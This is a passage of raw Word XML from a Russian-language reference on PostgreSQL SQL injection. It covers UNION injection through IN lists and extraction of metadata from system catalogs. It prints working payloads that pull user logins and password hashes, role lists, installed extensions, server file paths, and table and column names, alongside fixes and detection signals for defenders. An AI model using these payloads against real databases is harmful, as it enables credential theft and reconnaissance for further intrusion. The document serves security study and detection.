    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, customer_id, total FROM orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id IN (1, 2, 3) UNION SELECT id, login, password_hash FROM users--)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Закрывающая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шаблона попадает в комментарий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парсером игнорируется.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">С подгонкой типов:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1) UNION SELECT NULL::int, login::text, password_hash::text FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">С извлечением структуры схемы вместо данных:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1) UNION SELECT NULL, n.nspname, c.relname FROM pg_class c JOIN pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind = 'r'--</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Эндпоинт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/orders/by_ids</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает в ответе строки с credentials пользователей или с дампом структуры схемы вперемешку с ожидаемыми заказами.</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Парсер обрабатывает SQL после полной текстовой подстановки. Конструкция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id IN (1, 2, 3) UNION SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> синтаксически валидна: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имеет более низкий приоритет, чем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и связывается с внешним SELECT, а не с подвыражением внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Закрывающая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попадает в однострочный комментарий и не вызывает синтаксической ошибки.</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Уязвимый код, склеивающий IN-список. Application-роль с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на целевые таблицы; для метаданных из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доступен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по умолчанию.</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IN-список с числами — нормальная SQL-конструкция, в правильно написанном коде она параметризуется через массив: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id = ANY($1)</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типа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См. 5.7.1. Сам факт IN в логах ничего не значит — подозрителен f-string или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-склейка вокруг переменной длины списка.</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3.1.1, 3.1.2 (подготовительные шаги), 3.1.4 (метаданные через тот же канал), 3.10.1 (через IN-list можно протащить data-modifying CTE).</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PostgreSQL Documentation: Combining Queries; Row and Array Comparisons — IN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.4 Извлечение метаданных через UNION + `pg_class` / `pg_namespace`</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UNION-канал, направленный не на пользовательские данные, а на системные каталоги, снимает структуру всех schemas БД за один запрос. По сравнению с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обращение к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напрямую быстрее и видит больше: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 это набор views поверх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с фильтрами по правам.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Любая UNION-точка из 3.1.1 или 3.1.3.</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Все варианты предполагают точку входа из 3.1.1 или 3.1.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Перечисление установленных расширений — критически важная разведка, потому что определяет, какие категории атак вообще применимы (3.6 OOB через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3.7.2 RCE через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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0 UNION SELECT extname::text, extversion::text, NULL FROM pg_extension--</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0 UNION SELECT extname::text, extversion::text, NULL FROM pg_extension--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В ответе — список всех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на текущей БД с версиями.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доступен PUBLIC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Перечисление ролей и их атрибутов (без хешей паролей — это поле скрыто в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под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отличие от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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0 UNION SELECT rolname::text, rolsuper::text, rolcanlogin::text FROM pg_roles--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Возвращает имена всех ролей в кластере, кто суперюзер, кто может логиниться. Готовая мишень-карта для password spray или для прицельной эксплуатации под нужной ролью.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Утечка конфигурации сервера — пути на ФС, имя ОС-пользователя, версия:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0 UNION SELECT name::text, setting::text, NULL FROM pg_settings WHERE name IN ('data_directory', 'log_directory', 'unix_socket_directories', 'ssl_cert_file')--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эти параметры доступны для чтения PUBLIC. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data_directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — основное место хранения файлов БД, нужен для последующих </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_read_file('PG_VERSION', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и аналогичных атак из 3.6.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все таблицы во всех схемах, кроме системных — основа для прицельных extraction-запросов:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0 UNION SELECT n.nspname::text, c.relname::text, NULL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_class c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_namespace n ON n.oid = c.relnamespace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE c.relkind = 'r' AND n.nspname NOT IN ('pg_catalog', 'information_schema')--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все колонки конкретной таблицы — после того как имя выбрано из предыдущего payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0 UNION SELECT a.attname::text, format_type(a.atttypid, a.atttypmod)::text, NULL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_attribute a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE a.attrelid = 'public.users'::regclass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND a.attnum &gt; 0 AND NOT a.attisdropped--</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За один HTTP-запрос атакующий получает полную карту доступной для application-роли схемы БД — имена таблиц, колонок, типы. Дальше идёт прицельный extraction-запрос по полученным именам.</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хранит все relations (таблицы, индексы, sequences, materialized views, foreign tables);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 schemas;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 колонки. Чтение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доступно роли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по умолчанию — это документированное поведение, на нём держится работа ORM, миграционных тулов, мониторинга. Хеши паролей лежат в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(и его view </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 читать его может только суперюзер; в публичном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поле паролей маскируется как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Поэтому при инъекции в обычную application-роль перечислить ролей можно, а вытащить хеши — нельзя. Это меняет цель разведки: вместо credentials добывается карта инфраструктуры (расширения, схемы, пути) для следующего шага по цепочке.</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 доступен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только суперюзер.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доступно всегда любому пользователю, но возвращает только объекты, на которые у роли есть какие-либо права.</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Запросы к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 повседневный инструмент: миграционные тулы (Alembic, Flyway), schema introspection в ORM, мониторинг, psql, pgAdmin. Сам факт обращения к pg_catalog ничего не значит.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT ... FROM pg_extension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> из application-роли, у которой нет миграционной задачи. Application-сервер в стационарном режиме за этим расширением никогда не лезет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT ... FROM pg_settings WHERE name IN (...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с whitelist путей (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data_directory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log_directory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unix_socket_directories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ssl_cert_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Application не запрашивает пути на ФС — это маркер reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Массовое чтение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с фильтрами по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">attrelid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для разных таблиц подряд в коротком окне — снятие схемы. Легитимный ORM делает это один раз при инициализации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Любое появление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внутри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от точки, где других UNION в нормальном коде нет.</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 Базовый набор полей стабилен с PG 9.x.</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3.1.1, 3.1.2, 3.1.3 (точки входа), 3.8 (метаданные как самостоятельная категория).</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PostgreSQL Documentation: System Catalogs; The Information Schema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Паттерны:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.1 Определение числа колонок — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 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UNION SELECT NULL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.2 Подгонка типов через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">::text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.3 UNION внутри IN-списка</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
